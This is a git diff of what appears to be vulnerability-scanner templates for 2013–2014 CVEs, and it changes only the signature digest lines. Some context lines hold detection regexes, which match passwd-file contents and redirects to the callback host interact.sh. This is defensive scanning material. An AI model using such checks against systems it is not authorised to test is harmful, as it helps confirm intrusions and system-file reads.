4a0a0047304502202164b09280ac9e1924ee544d73625fd749c8015fe8680a575c7dffda5863f6470221009100d6ff15c2a8d8c9c666b7b1bc7e9ef94c3b1f08024e4b5977c3627d98a900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dc6be725ce1fa7221cd40b25f6da20c4d0ee44b8e6a0d422685f0dfaee45ca530221008a1f987a944e6c3a9816e8666409a3e55beff3fcd41c87a64d0abd82a4912c94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 731a8c9f84..01c044e875 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a21403994fa11c37171ef51e05837a5b168e8280718a470854ebb7353afcd8800221009cd3e4b0b4b71be9c3f3051d58491d2dbacdeac9b1fb4384b07abf479c55554e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206d19bf8ecabd7a342d56adcd4297422852393ef6cab78e9993256c41d6c2db430220074c888f7d143372b84efadd2f31976fce9a6ff6d731e2f4d7600420e1841a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 03118bbcc8..72ec0ae855 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d411c9cac78be8c4ab9a5bdfbc6d4114b99d7b7056c9bb27e3e32ac184482bea022100f177f6296d1afe8ddedb37e3d67eb07efe63553fae17ea089d4a75ca504e2f5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100966b6b0b4a918a9f1fe55193d0249a46797f4a82799feecc379d2ede00c2f55d022100f685671f8e03e4877d9ea71c119d6f6ccfcb1303458bae06f08b9e555b5de2f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 3e63fa5c58..44204bde37 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205d844efa33df37aa48d1267ca2585b084dd379d47dc44ad0b817d8a8b3889609022100da3ab34a223e01b513a86e460c9db9418b2100aa58e1ad8a38f360238672050a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220397810d5ab8ab8b82f64ed1972fcb4abbed706f9505884c65d0a216b8106bf74022100f6a6c3dd9166fb7eb7fc1c173342685ee35ef5484e3393b47a66dba7364882f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index ac3f74f129..b31311fc5f 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c8b364798eeaf67eb8fd9661e357a8d0875baf9aaa10872d9215c2389b1e5c50022100e01427f052b0b4953ed298b952a5765c2b6b35dd3c2c4b157568a808db6bd728:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220315dc27edeacd92d3299ed551a1c5240bb5e5614f6db9563557329a591ce0cab02206a8b19bd91d668619cbeafdeaa4d846d824db2454665b54bd25a4df79e2838f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index b3f0897619..0a367dd4ec 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201594ab82faa88c2638b590f8d2290c98cbba2ee290211a02a238f09cdf59789e02206977759c62401acb13c22b225a20b6b17866f8aacf67b8a67590ea7f7b0bc8b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100be02fdac786e491610190b50099a0ce87960337c3a64fadd06f6408ebb147fd4022100b3295a49e65f499266d917bc52808ccfae6264f6b448c06983015d0c26d25b51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index f232cefc9d..85c15c787b 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022079dad5452b1c88999fef931cbe9ebdc94b286f675f074daceba867d5b3c98f690221008f233d1dbd073f71171ad3756acc9a91929c93719348f87c26e4c5ba95c7b43e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203db25db5e5e4de50aae341f22577f8b8d710ac7791654e1776574087a8c3811a022100a2d6c799f3f59792aa66f7430884805852e965ce2a6bd7d03c5af47273175891:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index dcc74225d0..d18c3a90a6 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -56,4 +56,4 @@ http: - type: regex regex: - "root=.*:0:0" -# digest: 4a0a00473045022100f6cd40b93273474a23d293f197030390d10be43a736527361263f75941c19a1d02207e345080ec279f07c8b1a96d149c3a01abc367600abfbbf63a85dd89a95ef78b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022018e933dc0b64a50fc2fb2291fe0fe068e3b6ce401606ccfaca77a770b2b90880022100a65f7680f5397809fd6e7166167c9d7fb89e30c85c2c4ce8e5ddf62ff1c513fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index a638342e79..e094bca331 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cce17b78559a95bf2f0943f96165e78642e273d655b3c17c6881820cc40df09f02207f5a415fa7bf76725f80007066ad4921d9425a34255db8d656c34257296adea3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085e6d112ea7ef4a7833a7668c6b051ac44855b70dd7ec05c658983adcf4680ec022006588657644bf9bde06a06488d6bdb794f501662fbd380395fdcd12e2ad45ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index ada7d4c3c8..a5801ff21f 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cf1d735e7a763f8e92cbac05244f4058513dca66d977cff22094bf53df82ef05022100d45e86c3b9bc7f43e3339b4eb92a91b8f83331a6ecedfa3cbf9dee6a49453580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020888617dfe71531e618697e0fcccf4fcafa03fe02c295f230589d7449890a0002201f877c208eb1418846e64b8bc9cd8c4677f3f5464219102de5c4a0c3dbe7dea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index 157d09e484..627cea34a5 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022023bcec4a925719964d361455cce2d3185288b3dd03c0a9b3a61f8704b16ca756022100e7f90ae800794e873f1ef774d97e8007a67fbc2cf35e4fde660f40f31f262a43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a9d734021576f1426ea4a0bd73c67beadc43c253784846f91ddffd41f597880b022100f7963910ee7952b9952e3441d9815f03d92ed7cac15c88325decc2535dbdc943:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index cea3f4dc40..099301f4da 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -41,4 +41,4 @@ http: - type: regex regex: - "root:[x*]:0:0:" -# digest: 4b0a00483046022100e371572751932d4a500df96a892091eba4e0a4d8ce6a52634b13e38cd64f05cc022100dcb4be0eedfb4cb66a15ce756a7a6db6b4fd32eb5bd445bc094c025d8706bfd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc41963e152cb80e35da8316c109132de19ba635d41d2245381f2aaa2dff5cce022100b03b8f8c2427915570f9d5409a48ee44032f1e4e53c6ad8d22c5fb31353f4170:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 282e65681c..b8bb69ab43 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205cb959d082fabd4770f37fc68ad58966bd0be9ae6c3d679ca44b58065853a807022100a108783e71b8909c00ec2219ba21bd0eb739d3abc0b5e6b9f9ea0ee7d85cbf69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b7c90a2cfbe459a87dbbb307df3db7b44141074b36c34f8a61575b2ca7591520221009ea5a6ab23f19df671509f8466d795fcbeb8d48d995c89926ced47f9d3c8cd98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index aeb09fa129..41976e5eb4 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a67b8f296a38cdec3cc9fadbed079d23964fcd5973e2a30a4ebc3588772051e022100acee6714b419eaf8cf4ab99aef816ab12d1a04410e9aef0c8a18a45744943b0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201e07a87ca92a45e0c3e683810fe75ea4e13ef439d9c0761076ae7b1b3fedf1e402200f35676062726a99b31baaabd9878723ace952a9551ab845fb96fca30fd34799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 559529be23..84a5c2a95d 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022032e80b0db58d467a4ce0dccb54620714fa677489117263f882c989d96adb1e9b022100a4a43436790a6bfae53280a94851a270b2f0ae270d5b78e1c53f5be7f1911963:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fef1c81653b445d6876bb813525f0ad4a8d2f3bce3bf5fac3b7ae67f02ab55c9022100a8189aa1f6dba2f15e80d4fb511041f7e6a5e5921e7e9e82e118a1cb99f33559:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index c1b42f6c26..c9630b30e8 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -72,4 +72,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c75efbf9b064d21bacbd48c486b930e90217b4ae6e2d0ae67761ed727e5ae1c022100e524324c159f69fa14357b63d62c412273768e8b0377d797d5d02df83e454767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201147887d505805312869c53cf391931fb435d6ebb2a345de1298e9952e16582f0221008773ca103f3f110dd79ec2c08eff64ab0ea1d59fa388f1d9470371900fc9f0f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 1c6524f68c..a4025a14c3 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203d8c11ba1a31ffd7910585875338d74bcd708cd45c0dced1bc16f9ac789f0d3f022100d17f317a0370341a66779fb76b7e4559c2db7104613304dbd1455b6344151bfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205aac669d4a5a54dc948c50fd092acac57e7866b919782b44ac4830002791e4c20220754b3c310957be2dcb62fcf22f2dae9be958dd7d837d96fdaae4bab0f1ac0b72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 181d9dbb26..6eeb36f740 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205b0c4c45a1197068fe3d1c2e791783fc70cbcc9d3206f6e804636e2d200cef0c022100fc157a501cabd7d4201b7164e0daf392f982fa00c7962aa21e21c9b38dbd4618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b52e22b2b25abe5a19f721f332e8bf75bada2eb3d19c315bf4bcae42f83438c702206adca2c25b6c0ea47b913fdf0f2fc8b7c8d803f4a2f7dd210e6fe66dea2b7a4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 5beabf687e..b2ad8dcb63 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204632ba857d80985897ff6ed55d02178be53aea7b5bbeeb24fcd6e920d59022ed022100e4aa6568eb57f3a3597613e71186f142e2d44b6a70d5ad43a297aa76e6a2d89b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f574903d83a5801ef1d9545beaaa47d7c0488d0f6557a301e114d7b8bb6943902204dffab422339ed830bd7129f4941e1f0e386dce61aa3fee7d5c6e576a400d675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 8095b8dbc9..cb9287e5f9 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022030275d63dbfe56697607c6334a3c8a5811e5cb33d54692005337774bf344cebd022100afc9d9c7a60dabf6c42cb4ed7d333e4e6591ba5fba7baeaaf2b7af52de3126c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a3a6da10e2646e323b0e1402df5a0a8f1f7f1bd7f360285e9ce6c860044ee4f022100ed819ebc2215ceb117a336038a31b1e1403f039b09870e097bcde02e57e05aea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 2bb3fb697b..5819de6277 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022055663e58bcf6513417455b0efb0c97cfbac07cc9b0a2f73d2e0d75584454220102205bcd4da9178ae324924159c8150a0ff2df766bc8e7b3ec9b711da13f1de2cd8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207e22cdf6282c4a98b8dd936fe0b27f53880ba1510bcc2635b4ec310f92b090b8022100fa2e5048f8201cb3ff0c7107646d7d7ce231f377f9e085d0b676a185a3c2fa1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index fb2bf85812..ca0f4e8917 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ec3f2f4560e6231b16182d21760fdcc4a70b5d2aee0351cfbb9af25a402e2cad022100ba3b535bfbc3654a873212a9181fa6e19aa7a5dd22f2e02ff1fe3e15527b287e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e855f89287ebae2fedab76dbc205d7826f347f223499b7d29ca203da114980e0022100a9d104e9dfde8d776e11958351e829597e081afcab74bfae85f5388768d7a13d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index fca10862e5..74f2b7ba36 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f7fabab204109ff54cd90e8f812aa822a90c66eb03d80cebef59c28ba65c19920221009c5c4a4fbb6cdd88155f2a4e88f39da697ce828dac7d469c80e87613d4103203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fdcfab4922d8796050d75ce54d86d802b84c2037d6d63c97d6389b57ae60133002203a8bde99ea662cc20e306372114e7105ad88ec62a42c7812e0a13c7d085109d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 2e873e82b5..962a5e9d0f 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206b9d4be5067970ffa3d8e02079c4abf8441c982e0b6c0c19941b0a7e203321fc02201fede3e0462fdb7ea5a4287170f517900610ef02f321923bb5a57227cf800b54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f41fce0fe4ea55afe08e392d357d518f76a79c6defb6ca8511b388f8f100022a022050e3e10019d9333356dbe6e594d74c2e80530f624096c57c74b70f954cbb276f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index ee93326360..d39748ec44 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ffba8f39e1fa9c971f6701509b6aa0b2df388f4e902ae6270d75ccfc573d2a8a0220432aac2c8da61839bf96bcceb0e1e3f10c6cf2755f8c2006d438a53032d4a7ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f262c17c2d38c200c4f64eaff624d6ca4903149a5c9379d1b1de592f06230189022015ccc14685fc5f1018e9399f29d60987d59ed2466775e62810caa949ec8cc514:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index cc28a0a534..6c9f4ac9a0 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204bde1c3f42a0592f723d6907f857453ffc1cbaeade6b35e9f6d475fdbdf132c9022100e2f30a443e5904e106b93955a85dde211a5249aead2a75f789325c42c40efadc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207c77d8dec5838899fb0b5bcaaa704ce03794019ac3eee7ab38c6fc2b89ea7cb802206d118db82dbc520eacf12ac8e3bdd3dace23e753cf0cf2d06c6e23342a0c7273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 59abfcf55b..ec7d0a1987 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206611bdf8fb4c40e1d04dce364dce4905c11bbe2266ca7465719b55cf98d7949602207babdd83687bb04e4175613fe704b5c7b653537bbc366a9c8822e295b1cf16fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220715636195b40ff991c03fdb2384200a99a22e309ab3dc2f6cb3f7a2c6c28719a02206a0582db5e2daabfcb4749bc783bb844f0733b0716db0ee37e9a8e8780fdc9ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 5f3cab51ff..57bc690ac5 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100814319b746978b7ca718b8e25ca06acff4cad96360cbdef067269198629865cc02203d59471b74f7036f8c629f2e3a72650ce063c6c2bcf30ed8a1165aad0b4935ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f79db8dff76965b8f3ab5107b55776d293d39132096d384d82363a216e98fc2022100d76092c87bcc34cda20e601f4e6b01bfe01927bded785626ba5a85772fdfcfdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index bf6ac7e08f..3b501be0a0 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204edbc71eff8a4e2f830a6b91adba5649b330babc92cb13db3bc72f9eeadeeaed022032a4104312eed8dab0af4f004d133ef1c781de314cd466bcef35194a980c55c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022012ec28b7ae2fa5ce33f3b849a618ce6d294d4f289985e633959927d2448b8cad022100ece7f22daa65a7bd0eebb32142e90b3ce9f976cade0071f9690cdc7e62bac780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index d6341be61d..1f1d88f537 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a004630440220446a71d044997875a6e25df63044f0a0857752c262af93c4d2ad395a2e57d16c0220515a5679ead82478d29fb9a3415e6a433b25596bd8f56f8aabdb0724757cd73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220547a737881ebbba547bf355be3f161d38a9bd2f10b8811e29f6958aef12c49ab022100ee951982cbbea4df817b3881a1db7a04abc9cb8ab64d195f5b7f9046ac6d99b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index cfbe7037c3..ab4eeed546 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d63e192fa95e5914ae00c6a2f55a96eef98aeb85eee3f4171b3af2f9d3e52f6d0220578a283149c3a3345f1443cffed1f5bfee0ea458d32f450beabaebe2500f1e4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022047b35642f70a3b53211ace11f861e4765249fb4244c05f753ab279f89879e116022100c4a70fe22de8bb7f0a109f44b262232d559cc447faac3c2b2cb095908d770b8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index e044328774..326cfe37ed 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210080cd960c9becf8e609afed2036ce9d79e616dceacf52cf5865510c5c1f59220b022100d6ab15602efd08d89ec0f184f8f09651aa1a5b71bbae67567e34933901ec3cc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f25f32406e3e481ad9b2f50ea3be976ecd9a39128b79d8d6e6fc08bfddd80bac022100c8d8159a08640e3530b34a713a6f1112f13caa7fbb39ae1c1f45b218af9e2c6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 144c8dfc93..32545626db 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201aa63eb48fb97f26c497ba51d0b774678d7f99181ff592e8245940df0586f135022100ec53c24be8fe6c849d5700ba693ce9821767849c3c764eef8459fe2120e546fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8c58b7ce75987ee10d4a7a2dc87f86c3d65bd50843fac13a7b0d0641c1f20a00220570389114da5233ffcd4ccc05632c183ff57e6dc07babf80b21d2818decee813:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index a894613804..fafa68c4cf 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203ce0d1e40367b31eefec71137f6bf16ab3b345be2f2b7a7797a9784aa65eb723022014b4a8a7ae8933afffede51f1d4fd8208e04a33bebae97310111ca8fbbf01ab8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df4d1ce1a9c4a7c7ec1f9f7c4a2dea139740caed42f72b048f16634be7028fcb022040deb4ef640f0efcd128fe37ceaa1b08b48219bddb3695ccbd4789562061356f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 56a54e3022..1e5165fe0c 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 302 -# digest: 4a0a004730450221008ca7c8e2f8971e12c194148bb00ee6af61b7f7402b62a5b0e4b98d020d96eeca0220052a3891b6a4b52003d8e309f5a8c7af3005bbce6e11e69a25f6908273c8bebf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f2136d9d8c06c91744feb7dc1c42ffe6f13823841c3487a6844921ceaf142b2022003c2cbb6c9e75bae775fe0fc06e8ee12133e6d53c40b011a5d8b35cac33287ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index cecf244e49..93d5d6b2c2 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a00463044022006182b3df441f29283ee673c281717eda7a779b431ecc2f9cb6f9a85fd6dfc88022074682e3692cd0985fdc463c552d02b2315af9ba8dd367b8085661de9f9b79108:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201052d6d8b289bb24eb8e28b9777c3fe5d3dba8762e0a7d85949710ac75c87ecc0220548e894c1cd3f8a1cb3c9e71d58c48b458039bb761d70f2f5037e5e1a39f4afd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index 478b7858c2..1882749a65 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220110e65478297a1f1e19a5e98a5f65f7e6bb674ad23a3824ba952a06b72b3736f02210088cd00b58b916cf718bfd03fd71bfd051e0f737bec255d7752bfbf60ff169f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 